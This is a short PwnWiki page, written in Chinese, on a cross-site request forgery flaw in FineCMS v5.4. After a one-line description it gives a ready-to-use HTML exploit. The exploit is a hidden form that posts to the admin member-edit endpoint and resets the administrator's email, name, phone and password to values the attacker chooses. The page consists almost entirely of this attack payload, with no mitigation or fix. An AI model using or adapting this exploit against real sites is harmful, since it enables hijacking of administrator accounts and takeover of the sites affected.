Finecms v5.4 CSRF漏洞

From PwnWiki
Revision as of 13:42, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞描述== 惡意攻擊者可以精心偽造一個html頁面誘騙已登錄的管理用戶點擊,從而更改管理員賬戶密碼。 ==EXP== <pre> <html> <body>...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞描述

惡意攻擊者可以精心偽造一個html頁面誘騙已登錄的管理用戶點擊,從而更改管理員賬戶密碼。

EXP

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member[email]" value="[email protected]" />
      <input type="hidden" name="member[name]" value="admin" />
      <input type="hidden" name="member[phone]" value="18888888888" />
      <input type="hidden" name="member[password]" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Retrieved from "https://pwnwiki.com/index.php?title=Finecms_v5.4_CSRF漏洞&oldid=1676"